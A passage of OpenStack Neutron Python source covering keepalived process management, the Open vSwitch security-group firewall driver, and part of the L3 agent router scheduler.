config = ['global_defs {',
' notification_email_from %s' % KEEPALIVED_EMAIL_FROM,
' router_id %s' % KEEPALIVED_ROUTER_ID,
'}'
]
for instance in self.instances.values():
config.extend(instance.build_config())
return config
def get_config_str(self):
"""Generates and returns the keepalived configuration.
:return: Keepalived configuration string.
"""
return '\n'.join(self.build_config())
class KeepalivedManager(object):
"""Wrapper for keepalived.
This wrapper permits to write keepalived config files, to start/restart
keepalived process.
"""
def __init__(self, resource_id, config, process_monitor, conf_path='/tmp',
namespace=None):
self.resource_id = resource_id
self.config = config
self.namespace = namespace
self.process_monitor = process_monitor
self.conf_path = conf_path
def get_conf_dir(self):
confs_dir = os.path.abspath(os.path.normpath(self.conf_path))
conf_dir = os.path.join(confs_dir, self.resource_id)
return conf_dir
def get_full_config_file_path(self, filename, ensure_conf_dir=True):
conf_dir = self.get_conf_dir()
if ensure_conf_dir:
fileutils.ensure_tree(conf_dir, mode=0o755)
return os.path.join(conf_dir, filename)
def _output_config_file(self):
config_str = self.config.get_config_str()
config_path = self.get_full_config_file_path('keepalived.conf')
file_utils.replace_file(config_path, config_str)
return config_path
@staticmethod
def _safe_remove_pid_file(pid_file):
try:
os.remove(pid_file)
except OSError as e:
if e.errno != errno.ENOENT:
LOG.error(_LE("Could not delete file %s, keepalived can "
"refuse to start."), pid_file)
def get_vrrp_pid_file_name(self, base_pid_file):
return '%s-vrrp' % base_pid_file
def get_conf_on_disk(self):
config_path = self.get_full_config_file_path('keepalived.conf')
try:
with open(config_path) as conf:
return conf.read()
except (OSError, IOError) as e:
if e.errno != errno.ENOENT:
raise
def spawn(self):
config_path = self._output_config_file()
keepalived_pm = self.get_process()
vrrp_pm = self._get_vrrp_process(
self.get_vrrp_pid_file_name(keepalived_pm.get_pid_file_name()))
keepalived_pm.default_cmd_callback = (
self._get_keepalived_process_callback(vrrp_pm, config_path))
keepalived_pm.enable(reload_cfg=True)
self.process_monitor.register(uuid=self.resource_id,
service_name=KEEPALIVED_SERVICE_NAME,
monitored_process=keepalived_pm)
LOG.debug('Keepalived spawned with config %s', config_path)
def disable(self):
self.process_monitor.unregister(uuid=self.resource_id,
service_name=KEEPALIVED_SERVICE_NAME)
pm = self.get_process()
pm.disable(sig='15')
def get_process(self):
return external_process.ProcessManager(
cfg.CONF,
self.resource_id,
self.namespace,
pids_path=self.conf_path)
def _get_vrrp_process(self, pid_file):
return external_process.ProcessManager(
cfg.CONF,
self.resource_id,
self.namespace,
pid_file=pid_file)
def _get_keepalived_process_callback(self, vrrp_pm, config_path):
def callback(pid_file):
# If keepalived process crashed unexpectedly, the vrrp process
# will be orphan and prevent keepalived process to be spawned.
# A check here will let the l3-agent to kill the orphan process
# and spawn keepalived successfully.
if vrrp_pm.active:
vrrp_pm.disable()
self._safe_remove_pid_file(pid_file)
self._safe_remove_pid_file(self.get_vrrp_pid_file_name(pid_file))
cmd = ['keepalived', '-P',
'-f', config_path,
'-p', pid_file,
'-r', self.get_vrrp_pid_file_name(pid_file)]
return cmd
return callback
```
#### File: linux/openvswitch_firewall/firewall.py
```python
import netaddr
from neutron_lib import constants as lib_const
from neutron_lib import exceptions
from oslo_log import log as logging
from oslo_utils import netutils
from neutron._i18n import _, _LE, _LW
from neutron.agent import firewall
from neutron.agent.linux.openvswitch_firewall import constants as ovsfw_consts
from neutron.agent.linux.openvswitch_firewall import rules
from neutron.common import constants
from neutron.plugins.ml2.drivers.openvswitch.agent.common import constants \
as ovs_consts
LOG = logging.getLogger(__name__)
def _replace_register(flow_params, register_number, register_value):
"""Replace value from flows to given register number
'register_value' key in dictionary will be replaced by register number
given by 'register_number'
:param flow_params: Dictionary containing defined flows
:param register_number: The number of register where value will be stored
:param register_value: Key to be replaced by register number
"""
try:
reg_port = flow_params[register_value]
del flow_params[register_value]
flow_params['reg{:d}'.format(register_number)] = reg_port
except KeyError:
pass
def create_reg_numbers(flow_params):
"""Replace reg_(port|net) values with defined register numbers"""
_replace_register(flow_params, ovsfw_consts.REG_PORT, 'reg_port')
_replace_register(flow_params, ovsfw_consts.REG_NET, 'reg_net')
class OVSFWPortNotFound(exceptions.NeutronException):
message = _("Port %(port_id)s is not managed by this agent. ")
class SecurityGroup(object):
def __init__(self, id_):
self.id = id_
self.raw_rules = []
self.remote_rules = []
self.members = {}
self.ports = set()
def update_rules(self, rules):
"""Separate raw and remote rules."""
self.raw_rules = [rule for rule in rules
if 'remote_group_id' not in rule]
self.remote_rules = [rule for rule in rules
if 'remote_group_id' in rule]
def get_ethertype_filtered_addresses(self, ethertype,
exclude_addresses=None):
exclude_addresses = set(exclude_addresses) or set()
group_addresses = set(self.members.get(ethertype, []))
return list(group_addresses - exclude_addresses)
class OFPort(object):
def __init__(self, port_dict, ovs_port, vlan_tag):
self.id = port_dict['device']
self.vlan_tag = vlan_tag
self.mac = ovs_port.vif_mac
self.lla_address = str(netutils.get_ipv6_addr_by_EUI64(
lib_const.IPv6_LLA_PREFIX, self.mac))
self.ofport = ovs_port.ofport
self.sec_groups = list()
self.fixed_ips = port_dict.get('fixed_ips', [])
self.neutron_port_dict = port_dict.copy()
self.allowed_pairs_v4 = self._get_allowed_pairs(port_dict, version=4)
self.allowed_pairs_v6 = self._get_allowed_pairs(port_dict, version=6)
@staticmethod
def _get_allowed_pairs(port_dict, version):
aap_dict = port_dict.get('allowed_address_pairs', set())
return {(aap['mac_address'], aap['ip_address']) for aap in aap_dict
if netaddr.IPAddress(aap['ip_address']).version == version}
@property
def ipv4_addresses(self):
return [ip_addr for ip_addr in self.fixed_ips
if netaddr.IPAddress(ip_addr).version == 4]
@property
def ipv6_addresses(self):
return [ip_addr for ip_addr in self.fixed_ips
if netaddr.IPAddress(ip_addr).version == 6]
def update(self, port_dict):
self.allowed_pairs_v4 = self._get_allowed_pairs(port_dict,
version=4)
self.allowed_pairs_v6 = self._get_allowed_pairs(port_dict,
version=6)
# Neighbour discovery uses LLA
self.allowed_pairs_v6.add((self.mac, self.lla_address))
self.fixed_ips = port_dict.get('fixed_ips', [])
self.neutron_port_dict = port_dict.copy()
class SGPortMap(object):
def __init__(self):
self.ports = {}
self.sec_groups = {}
def get_or_create_sg(self, sg_id):
try:
sec_group = self.sec_groups[sg_id]
except KeyError:
sec_group = SecurityGroup(sg_id)
self.sec_groups[sg_id] = sec_group
return sec_group
def create_port(self, port, port_dict):
self.ports[port.id] = port
self.update_port(port, port_dict)
def update_port(self, port, port_dict):
for sec_group in self.sec_groups.values():
sec_group.ports.discard(port)
port.sec_groups = [self.get_or_create_sg(sg_id)
for sg_id in port_dict['security_groups']]
for sec_group in port.sec_groups:
sec_group.ports.add(port)
port.update(port_dict)
def remove_port(self, port):
for sec_group in port.sec_groups:
sec_group.ports.discard(port)
del self.ports[port.id]
def update_rules(self, sg_id, rules):
sec_group = self.get_or_create_sg(sg_id)
sec_group.update_rules(rules)
def update_members(self, sg_id, members):
sec_group = self.get_or_create_sg(sg_id)
sec_group.members = members
class OVSFirewallDriver(firewall.FirewallDriver):
REQUIRED_PROTOCOLS = [
ovs_consts.OPENFLOW10,
ovs_consts.OPENFLOW11,
ovs_consts.OPENFLOW12,
ovs_consts.OPENFLOW13,
ovs_consts.OPENFLOW14,
]
provides_arp_spoofing_protection = True
def __init__(self, integration_bridge):
"""Initialize object
:param integration_bridge: Bridge on which openflow rules will be
applied
"""
self.int_br = self.initialize_bridge(integration_bridge)
self.sg_port_map = SGPortMap()
self._deferred = False
self._drop_all_unmatched_flows()
def security_group_updated(self, action_type, sec_group_ids,
device_ids=None):
"""The current driver doesn't make use of this method.
It exists here to avoid NotImplementedError raised from the parent
class's method.
"""
def _accept_flow(self, **flow):
flow['ct_state'] = ovsfw_consts.OF_STATE_ESTABLISHED_NOT_REPLY
self._add_flow(**flow)
flow['ct_state'] = ovsfw_consts.OF_STATE_NEW_NOT_ESTABLISHED
if flow['table'] == ovs_consts.RULES_INGRESS_TABLE:
flow['actions'] = (
'ct(commit,zone=NXM_NX_REG{:d}[0..15]),{:s}'.format(
ovsfw_consts.REG_NET, flow['actions']))
self._add_flow(**flow)
def _add_flow(self, **kwargs):
dl_type = kwargs.get('dl_type')
create_reg_numbers(kwargs)
if isinstance(dl_type, int):
kwargs['dl_type'] = "0x{:04x}".format(dl_type)
if self._deferred:
self.int_br.add_flow(**kwargs)
else:
self.int_br.br.add_flow(**kwargs)
def _delete_flows(self, **kwargs):
create_reg_numbers(kwargs)
if self._deferred:
self.int_br.delete_flows(**kwargs)
else:
self.int_br.br.delete_flows(**kwargs)
@staticmethod
def initialize_bridge(int_br):
int_br.set_protocols(OVSFirewallDriver.REQUIRED_PROTOCOLS)
return int_br.deferred(full_ordered=True)
def _drop_all_unmatched_flows(self):
for table in ovs_consts.OVS_FIREWALL_TABLES:
self.int_br.br.add_flow(table=table, priority=0, actions='drop')
def get_or_create_ofport(self, port):
port_id = port['device']
try:
of_port = self.sg_port_map.ports[port_id]
except KeyError:
ovs_port = self.int_br.br.get_vif_port_by_id(port_id)
if not ovs_port:
raise OVSFWPortNotFound(port_id=port_id)
try:
other_config = self.int_br.br.db_get_val(
'Port', ovs_port.port_name, 'other_config')
port_vlan_id = int(other_config['tag'])
except (KeyError, TypeError):
LOG.warning(_LW("Cannot get tag for port %(port_id)s from "
"its other_config: %(other_config)s"),
{'port_id': port_id,
'other_config': other_config})
port_vlan_id = ovs_consts.DEAD_VLAN_TAG
of_port = OFPort(port, ovs_port, port_vlan_id)
self.sg_port_map.create_port(of_port, port)
else:
self.sg_port_map.update_port(of_port, port)
return of_port
def is_port_managed(self, port):
return port['device'] in self.sg_port_map.ports
def prepare_port_filter(self, port):
if not firewall.port_sec_enabled(port):
return
port_exists = self.is_port_managed(port)
of_port = self.get_or_create_ofport(port)
if port_exists:
LOG.error(_LE("Initializing port %s that was already "
"initialized."),
port['device'])
self.delete_all_port_flows(of_port)
self.initialize_port_flows(of_port)
self.add_flows_from_rules(of_port)
def update_port_filter(self, port):
"""Update rules for given port
Current existing filtering rules are removed and new ones are generated
based on current loaded security group rules and members.
"""
if not firewall.port_sec_enabled(port):
self.remove_port_filter(port)
return
elif not self.is_port_managed(port):
self.prepare_port_filter(port)
return
of_port = self.get_or_create_ofport(port)
# TODO(jlibosva): Handle firewall blink
self.delete_all_port_flows(of_port)
self.initialize_port_flows(of_port)
self.add_flows_from_rules(of_port)
def remove_port_filter(self, port):
"""Remove port from firewall
All flows related to this port are removed from ovs. Port is also
removed from ports managed by this firewall.
"""
if self.is_port_managed(port):
of_port = self.get_or_create_ofport(port)
self.delete_all_port_flows(of_port)
self.sg_port_map.remove_port(of_port)
def update_security_group_rules(self, sg_id, rules):
self.sg_port_map.update_rules(sg_id, rules)
def update_security_group_members(self, sg_id, member_ips):
self.sg_port_map.update_members(sg_id, member_ips)
def filter_defer_apply_on(self):
self._deferred = True
def filter_defer_apply_off(self):
if self._deferred:
self.int_br.apply_flows()
self._deferred = False
@property
def ports(self):
return {id_: port.neutron_port_dict
for id_, port in self.sg_port_map.ports.items()}
def initialize_port_flows(self, port):
"""Set base flows for port
:param port: OFPort instance
"""
# Identify egress flow
self._add_flow(
table=ovs_consts.LOCAL_SWITCHING,
priority=100,
in_port=port.ofport,
actions='set_field:{:d}->reg{:d},'
'set_field:{:d}->reg{:d},'
'resubmit(,{:d})'.format(
port.ofport,
ovsfw_consts.REG_PORT,
port.vlan_tag,
ovsfw_consts.REG_NET,
ovs_consts.BASE_EGRESS_TABLE)
)
# Identify ingress flows after egress filtering
self._add_flow(
table=ovs_consts.LOCAL_SWITCHING,
priority=90,
dl_dst=port.mac,
actions='set_field:{:d}->reg{:d},'
'set_field:{:d}->reg{:d},'
'resubmit(,{:d})'.format(
port.ofport,
ovsfw_consts.REG_PORT,
port.vlan_tag,
ovsfw_consts.REG_NET,
ovs_consts.BASE_INGRESS_TABLE),
)
self._initialize_egress(port)
self._initialize_ingress(port)
def _initialize_egress_ipv6_icmp(self, port):
for icmp_type in firewall.ICMPV6_ALLOWED_TYPES:
self._add_flow(
table=ovs_consts.BASE_EGRESS_TABLE,
priority=95,
in_port=port.ofport,
reg_port=port.ofport,
dl_type=constants.ETHERTYPE_IPV6,
nw_proto=lib_const.PROTO_NUM_IPV6_ICMP,
icmp_type=icmp_type,
actions='normal'
)
def _initialize_egress(self, port):
"""Identify egress traffic and send it to egress base"""
self._initialize_egress_ipv6_icmp(port)
# Apply mac/ip pairs for IPv4
allowed_pairs = port.allowed_pairs_v4.union(
{(port.mac, ip_addr) for ip_addr in port.ipv4_addresses})
for mac_addr, ip_addr in allowed_pairs:
self._add_flow(
table=ovs_consts.BASE_EGRESS_TABLE,
priority=95,
in_port=port.ofport,
reg_port=port.ofport,
dl_src=mac_addr,
dl_type=constants.ETHERTYPE_ARP,
arp_spa=ip_addr,
actions='normal'
)
self._add_flow(
table=ovs_consts.BASE_EGRESS_TABLE,
priority=65,
reg_port=port.ofport,
ct_state=ovsfw_consts.OF_STATE_NOT_TRACKED,
dl_type=constants.ETHERTYPE_IP,
in_port=port.ofport,
dl_src=mac_addr,
nw_src=ip_addr,
actions='ct(table={:d},zone=NXM_NX_REG{:d}[0..15])'.format(
ovs_consts.RULES_EGRESS_TABLE,
ovsfw_consts.REG_NET)
)
# Apply mac/ip pairs for IPv6
allowed_pairs = port.allowed_pairs_v6.union(
{(port.mac, ip_addr) for ip_addr in port.ipv6_addresses})
for mac_addr, ip_addr in allowed_pairs:
self._add_flow(
table=ovs_consts.BASE_EGRESS_TABLE,
priority=65,
reg_port=port.ofport,
in_port=port.ofport,
ct_state=ovsfw_consts.OF_STATE_NOT_TRACKED,
dl_type=constants.ETHERTYPE_IPV6,
dl_src=mac_addr,
ipv6_src=ip_addr,
actions='ct(table={:d},zone=NXM_NX_REG{:d}[0..15])'.format(
ovs_consts.RULES_EGRESS_TABLE,
ovsfw_consts.REG_NET)
)
# DHCP discovery
for dl_type, src_port, dst_port in (
(constants.ETHERTYPE_IP, 68, 67),
(constants.ETHERTYPE_IPV6, 546, 547)):
self._add_flow(
table=ovs_consts.BASE_EGRESS_TABLE,
priority=80,
reg_port=port.ofport,
in_port=port.ofport,
dl_type=dl_type,
nw_proto=lib_const.PROTO_NUM_UDP,
tp_src=src_port,
tp_dst=dst_port,
actions='resubmit(,{:d})'.format(
ovs_consts.ACCEPT_OR_INGRESS_TABLE)
)
# Ban dhcp service running on an instance
for dl_type, src_port, dst_port in (
(constants.ETHERTYPE_IP, 67, 68),
(constants.ETHERTYPE_IPV6, 547, 546)):
self._add_flow(
table=ovs_consts.BASE_EGRESS_TABLE,
priority=70,
in_port=port.ofport,
reg_port=port.ofport,
dl_type=dl_type,
nw_proto=lib_const.PROTO_NUM_UDP,
tp_src=src_port,
tp_dst=dst_port,
actions='drop'
)
# Drop all remaining not tracked egress connections
self._add_flow(
table=ovs_consts.BASE_EGRESS_TABLE,
priority=10,
ct_state=ovsfw_consts.OF_STATE_NOT_TRACKED,
in_port=port.ofport,
reg_port=port.ofport,
actions='drop'
)
# Fill in accept_or_ingress table by checking that traffic is ingress
# and if not, accept it
self._add_flow(
table=ovs_consts.ACCEPT_OR_INGRESS_TABLE,
priority=100,
dl_dst=port.mac,
actions='set_field:{:d}->reg{:d},resubmit(,{:d})'.format(
port.ofport,
ovsfw_consts.REG_PORT,
ovs_consts.BASE_INGRESS_TABLE),
)
for ethertype in [constants.ETHERTYPE_IP, constants.ETHERTYPE_IPV6]:
self._add_flow(
table=ovs_consts.ACCEPT_OR_INGRESS_TABLE,
priority=90,
dl_type=ethertype,
reg_port=port.ofport,
ct_state=ovsfw_consts.OF_STATE_NEW_NOT_ESTABLISHED,
actions='ct(commit,zone=NXM_NX_REG{:d}[0..15]),normal'.format(
ovsfw_consts.REG_NET)
)
self._add_flow(
table=ovs_consts.ACCEPT_OR_INGRESS_TABLE,
priority=80,
reg_port=port.ofport,
actions='normal'
)
def _initialize_tracked_egress(self, port):
# Drop invalid packets
self._add_flow(
table=ovs_consts.RULES_EGRESS_TABLE,
priority=50,
ct_state=ovsfw_consts.OF_STATE_INVALID,
actions='drop'
)
# Drop traffic for removed sg rules
self._add_flow(
table=ovs_consts.RULES_EGRESS_TABLE,
priority=50,
reg_port=port.ofport,
ct_mark=ovsfw_consts.CT_MARK_INVALID,
actions='drop'
)
for state in (
ovsfw_consts.OF_STATE_ESTABLISHED_REPLY,
ovsfw_consts.OF_STATE_RELATED,
):
self._add_flow(
table=ovs_consts.RULES_EGRESS_TABLE,
priority=50,
ct_state=state,
ct_mark=ovsfw_consts.CT_MARK_NORMAL,
reg_port=port.ofport,
ct_zone=port.vlan_tag,
actions='normal'
)
self._add_flow(
table=ovs_consts.RULES_EGRESS_TABLE,
priority=40,
reg_port=port.ofport,
ct_state=ovsfw_consts.OF_STATE_NOT_ESTABLISHED,
actions='drop'
)
for ethertype in [constants.ETHERTYPE_IP, constants.ETHERTYPE_IPV6]:
self._add_flow(
table=ovs_consts.RULES_EGRESS_TABLE,
priority=40,
dl_type=ethertype,
reg_port=port.ofport,
ct_state=ovsfw_consts.OF_STATE_ESTABLISHED,
actions="ct(commit,zone=NXM_NX_REG{:d}[0..15],"
"exec(set_field:{:s}->ct_mark))".format(
ovsfw_consts.REG_NET,
ovsfw_consts.CT_MARK_INVALID)
)
def _initialize_ingress_ipv6_icmp(self, port):
for icmp_type in firewall.ICMPV6_ALLOWED_TYPES:
self._add_flow(
table=ovs_consts.BASE_INGRESS_TABLE,
priority=100,
reg_port=port.ofport,
dl_dst=port.mac,
dl_type=constants.ETHERTYPE_IPV6,
nw_proto=lib_const.PROTO_NUM_IPV6_ICMP,
icmp_type=icmp_type,
actions='strip_vlan,output:{:d}'.format(port.ofport),
)
def _initialize_ingress(self, port):
# Allow incoming ARPs
self._add_flow(
table=ovs_consts.BASE_INGRESS_TABLE,
priority=100,
dl_type=constants.ETHERTYPE_ARP,
reg_port=port.ofport,
dl_dst=port.mac,
actions='strip_vlan,output:{:d}'.format(port.ofport),
)
self._initialize_ingress_ipv6_icmp(port)
# DHCP offers
for dl_type, src_port, dst_port in (
(constants.ETHERTYPE_IP, 67, 68),
(constants.ETHERTYPE_IPV6, 547, 546)):
self._add_flow(
table=ovs_consts.BASE_INGRESS_TABLE,
priority=95,
reg_port=port.ofport,
dl_type=dl_type,
nw_proto=lib_const.PROTO_NUM_UDP,
tp_src=src_port,
tp_dst=dst_port,
actions='strip_vlan,output:{:d}'.format(port.ofport),
)
# Track untracked
for dl_type in (constants.ETHERTYPE_IP, constants.ETHERTYPE_IPV6):
self._add_flow(
table=ovs_consts.BASE_INGRESS_TABLE,
priority=90,
reg_port=port.ofport,
dl_type=dl_type,
ct_state=ovsfw_consts.OF_STATE_NOT_TRACKED,
actions='ct(table={:d},zone=NXM_NX_REG{:d}[0..15])'.format(
ovs_consts.RULES_INGRESS_TABLE,
ovsfw_consts.REG_NET)
)
self._add_flow(
table=ovs_consts.BASE_INGRESS_TABLE,
ct_state=ovsfw_consts.OF_STATE_TRACKED,
priority=80,
reg_port=port.ofport,
dl_dst=port.mac,
actions='resubmit(,{:d})'.format(ovs_consts.RULES_INGRESS_TABLE)
)
def _initialize_tracked_ingress(self, port):
# Drop invalid packets
self._add_flow(
table=ovs_consts.RULES_INGRESS_TABLE,
priority=50,
ct_state=ovsfw_consts.OF_STATE_INVALID,
actions='drop'
)
# Drop traffic for removed sg rules
self._add_flow(
table=ovs_consts.RULES_INGRESS_TABLE,
priority=50,
reg_port=port.ofport,
ct_mark=ovsfw_consts.CT_MARK_INVALID,
actions='drop'
)
# Allow established and related connections
for state in (ovsfw_consts.OF_STATE_ESTABLISHED_REPLY,
ovsfw_consts.OF_STATE_RELATED):
self._add_flow(
table=ovs_consts.RULES_INGRESS_TABLE,
priority=50,
dl_dst=port.mac,
reg_port=port.ofport,
ct_state=state,
ct_mark=ovsfw_consts.CT_MARK_NORMAL,
ct_zone=port.vlan_tag,
actions='strip_vlan,output:{:d}'.format(port.ofport)
)
self._add_flow(
table=ovs_consts.RULES_INGRESS_TABLE,
priority=40,
reg_port=port.ofport,
ct_state=ovsfw_consts.OF_STATE_NOT_ESTABLISHED,
actions='drop'
)
for ethertype in [constants.ETHERTYPE_IP, constants.ETHERTYPE_IPV6]:
self._add_flow(
table=ovs_consts.RULES_INGRESS_TABLE,
priority=40,
dl_type=ethertype,
reg_port=port.ofport,
ct_state=ovsfw_consts.OF_STATE_ESTABLISHED,
actions="ct(commit,zone=NXM_NX_REG{:d}[0..15],"
"exec(set_field:{:s}->ct_mark))".format(
ovsfw_consts.REG_NET,
ovsfw_consts.CT_MARK_INVALID)
)
def add_flows_from_rules(self, port):
self._initialize_tracked_ingress(port)
self._initialize_tracked_egress(port)
LOG.debug('Creating flow rules for port %s that is port %d in OVS',
port.id, port.ofport)
rules_generator = self.create_rules_generator_for_port(port)
for rule in rules_generator:
flows = rules.create_flows_from_rule_and_port(rule, port)
LOG.debug("RULGEN: Rules generated for flow %s are %s",
rule, flows)
for flow in flows:
self._accept_flow(**flow)
def create_rules_generator_for_port(self, port):
for sec_group in port.sec_groups:
for rule in sec_group.raw_rules:
yield rule
for rule in sec_group.remote_rules:
remote_group = self.sg_port_map.sec_groups[
rule['remote_group_id']]
for ip_addr in remote_group.get_ethertype_filtered_addresses(
rule['ethertype'], port.fixed_ips):
yield rules.create_rule_for_ip_address(ip_addr, rule)
def delete_all_port_flows(self, port):
"""Delete all flows for given port"""
self._delete_flows(table=ovs_consts.LOCAL_SWITCHING, dl_dst=port.mac)
self._delete_flows(table=ovs_consts.LOCAL_SWITCHING,
in_port=port.ofport)
self._delete_flows(reg_port=port.ofport)
self._delete_flows(table=ovs_consts.ACCEPT_OR_INGRESS_TABLE,
dl_dst=port.mac)
```
#### File: neutron/scheduler/l3_agent_scheduler.py
```python
import abc
import collections
import functools
import itertools
import random
from neutron_lib import constants as lib_const
from oslo_config import cfg
from oslo_db import exception as db_exc
from oslo_log import log as logging
import six
from sqlalchemy import sql
from neutron._i18n import _LE, _LW
from neutron.common import utils
from neutron.db import api as db_api
from neutron.db import l3_hamode_db
from neutron.db.models import l3 as l3_models
from neutron.db.models import l3agent as rb_model
from neutron.extensions import availability_zone as az_ext
from neutron.extensions import l3
LOG = logging.getLogger(__name__)
cfg.CONF.register_opts(l3_hamode_db.L3_HA_OPTS)
@six.add_metaclass(abc.ABCMeta)
class L3Scheduler(object):
def __init__(self):
self.min_ha_agents = cfg.CONF.min_l3_agents_per_router
self.max_ha_agents = cfg.CONF.max_l3_agents_per_router
@abc.abstractmethod
def schedule(self, plugin, context, router_id,
candidates=None, hints=None):
"""Schedule the router to an active L3 agent.
Schedule the router only if it is not already scheduled.
"""
pass
def _router_has_binding(self, context, router_id, l3_agent_id):
router_binding_model = rb_model.RouterL3AgentBinding
query = context.session.query(router_binding_model)
query = query.filter(router_binding_model.router_id == router_id,
router_binding_model.l3_agent_id == l3_agent_id)
return query.count() > 0
def _filter_unscheduled_routers(self, plugin, context, routers):
"""Filter from list of routers the ones that are not scheduled."""
unscheduled_routers = []
for router in routers:
l3_agents = plugin.get_l3_agents_hosting_routers(
context, [router['id']])
if l3_agents:
LOG.debug('Router %(router_id)s has already been '
'hosted by L3 agent %(agent_id)s',
{'router_id': router['id'],
'agent_id': l3_agents[0]['id']})
else:
unscheduled_routers.append(router)
return unscheduled_routers
def _get_unscheduled_routers(self, plugin, context):
"""Get routers with no agent binding."""
# TODO(gongysh) consider the disabled agent's router
no_agent_binding = ~sql.exists().where(
l3_models.Router.id ==
rb_model.RouterL3AgentBinding.router_id)
query = context.session.query(
l3_models.Router.id).filter(no_agent_binding)
unscheduled_router_ids = [router_id_[0] for router_id_ in query]
if unscheduled_router_ids:
return plugin.get_routers(
context, filters={'id': unscheduled_router_ids})
return []
def _get_routers_to_schedule(self, plugin, context, router_ids=None):
"""Verify that the routers specified need to be scheduled.
:param context: the context
:param plugin: the core plugin
:param router_ids: the list of routers to be checked for scheduling
:returns: the list of routers to be scheduled
"""
if router_ids is not None:
filters = {'id': router_ids}
routers = plugin.get_routers(context, filters=filters)
result = self._filter_unscheduled_routers(plugin, context, routers)
else:
result = self._get_unscheduled_routers(plugin, context)
return [r for r in result
if plugin.router_supports_scheduling(context, r['id'])]
def _get_routers_can_schedule(self, plugin, context, routers, l3_agent):
"""Get the subset of routers that can be scheduled on the L3 agent."""
ids_to_discard = set()
for router in routers:
# check if the l3 agent is compatible with the router
candidates = plugin.get_l3_agent_candidates(
context, router, [l3_agent])
if not candidates:
ids_to_discard.add(router['id'])
return [r for r in routers if r['id'] not in ids_to_discard]
def auto_schedule_routers(self, plugin, context, host, router_ids):
"""Schedule non-hosted routers to L3 Agent running on host.
If router_ids is given, each router in router_ids is scheduled
if it is not scheduled yet. Otherwise all unscheduled routers
are scheduled.
Do not schedule the routers which are hosted already
by active l3 agents.
:returns: True if routers have been successfully assigned to host
"""
l3_agent = plugin.get_enabled_agent_on_host(
context, lib_const.AGENT_TYPE_L3, host)
if not l3_agent:
return
unscheduled_routers = self._get_routers_to_schedule(
plugin, context, router_ids)
if not unscheduled_routers:
if utils.is_extension_supported(
plugin, lib_const.L3_HA_MODE_EXT_ALIAS):
self._schedule_ha_routers_to_additional_agent(
plugin, context, l3_agent)
return
target_routers = self._get_routers_can_schedule(
plugin, context, unscheduled_routers, l3_agent)
if not target_routers:
LOG.warning(_LW('No routers compatible with L3 agent '
'configuration on host %s'), host)
return
self._bind_routers(plugin, context, target_routers, l3_agent)
def _get_candidates(self, plugin, context, sync_router):
"""Return L3 agents where a router could be scheduled."""
with context.session.begin(subtransactions=True):
# allow one router is hosted by just
# one enabled l3 agent hosting since active is just a
# timing problem. Non-active l3 agent can return to
# active any time
current_l3_agents = plugin.get_l3_agents_hosting_routers(
context, [sync_router['id']], admin_state_up=True)
if current_l3_agents:
LOG.debug('Router %(router_id)s has already been hosted '
'by L3 agent %(agent_id)s',
{'router_id': sync_router['id'],
'agent_id': current_l3_agents[0]['id']})
return []
active_l3_agents = plugin.get_l3_agents(context, active=True)
if not active_l3_agents:
LOG.warning(_LW('No active L3 agents'))
return []
candidates = plugin.get_l3_agent_candidates(context,
sync_router,
active_l3_agents)
if not candidates:
LOG.warning(_LW('No L3 agents can host the router %s'),
sync_router['id'])
return candidates
def _bind_routers(self, plugin, context, routers, l3_agent):
for router in routers:
if router.get('ha'):
if not self._router_has_binding(context, router['id'],
l3_agent.id):
self.create_ha_port_and_bind(
plugin, context, router['id'],
router['tenant_id'], l3_agent)
else:
self.bind_router(plugin, context, router['id'], l3_agent.id)
@db_api.retry_db_errors
def bind_router(self, plugin, context, router_id, agent_id,
is_manual_scheduling=False, is_ha=False):
"""Bind the router to the l3 agent which has been chosen.
The function tries to create a RouterL3AgentBinding object and add it
to the database. It returns the binding that was created or None if it
failed to create it due to some conflict.
In the HA router case, when creating a RouterL3AgentBinding (with some
binding_index) fails because some other RouterL3AgentBinding was
concurrently created using the same binding_index, then the function
will retry to create an entry with a new binding_index. This creation
will be retried up to db_api.MAX_RETRIES times.
If, still in the HA router case, the creation failed because the
router has already been bound to the l3 agent in question or has been
removed (by a concurrent operation), then no further attempts will be
made and the function will return None.
Note that for non-HA routers, the function will always perform exactly
one try, regardless of the error preventing the addition of a new
RouterL3AgentBinding object to the database.
"""
bindings = context.session.query(
rb_model.RouterL3AgentBinding).filter_by(router_id=router_id)
if bindings.filter_by(l3_agent_id=agent_id).first():
LOG.debug('Router %(router_id)s has already been scheduled '
'to L3 agent %(agent_id)s.',
{'router_id': router_id, 'agent_id': agent_id})
return
if not is_ha:
binding_index = rb_model.LOWEST_BINDING_INDEX
if bindings.filter_by(binding_index=binding_index).first():
LOG.debug('Non-HA router %s has already been scheduled',
router_id)
return
else:
binding_index = plugin.get_vacant_binding_index(
context, router_id, is_manual_scheduling)
if binding_index < rb_model.LOWEST_BINDING_INDEX:
LOG.debug('Unable to find a vacant binding_index for '
'router %(router_id)s and agent %(agent_id)s',
{'router_id': router_id,
'agent_id': agent_id})
return
try:
with context.session.begin(subtransactions=True):
binding = rb_model.RouterL3AgentBinding()
binding.l3_agent_id = agent_id
binding.router_id = router_id
binding.binding_index = binding_index
context.session.add(binding)
LOG.debug('Router %(router_id)s is scheduled to L3 agent '
'%(agent_id)s with binding_index %(binding_index)d',
{'router_id': router_id,
'agent_id': agent_id,
'binding_index': binding_index})
return binding
except db_exc.DBReferenceError:
LOG.debug('Router %s has already been removed '
'by concurrent operation', router_id)
def _schedule_router(self, plugin, context, router_id,
candidates=None):
if not plugin.router_supports_scheduling(context, router_id):
return
sync_router = plugin.get_router(context, router_id)
candidates = candidates or self._get_candidates(
plugin, context, sync_router)
if not candidates:
return
elif sync_router.get('ha', False):
chosen_agents = self._bind_ha_router(plugin, context,
router_id,
sync_router.get('tenant_id'),
candidates)
if not chosen_agents:
return
chosen_agent = chosen_agents[-1]
else:
chosen_agent = self._choose_router_agent(
plugin, context, candidates)
self.bind_router(plugin, context, router_id, chosen_agent.id)
return chosen_agent
@abc.abstractmethod
def _choose_router_agent(self, plugin, context, candidates):
"""Choose an agent from candidates based on a specific policy."""
pass
@abc.abstractmethod
def _choose_router_agents_for_ha(self, plugin, context, candidates):
"""Choose agents from candidates based on a specific policy."""
pass
def _get_num_of_agents_for_ha(self, candidates_count):
return (min(self.max_ha_agents, candidates_count) if self.max_ha_agents
else candidates_count)
def _enough_candidates_for_ha(self, candidates):
if not candidates or len(candidates) < self.min_ha_agents:
LOG.error(_LE("Not enough candidates, a HA router needs at least "
"%s agents"), self.min_ha_agents)
return False
return True
def _add_port_from_net_and_ensure_vr_id(self, plugin, ctxt, router_db,
tenant_id, ha_net):
plugin._ensure_vr_id(ctxt, router_db, ha_net)
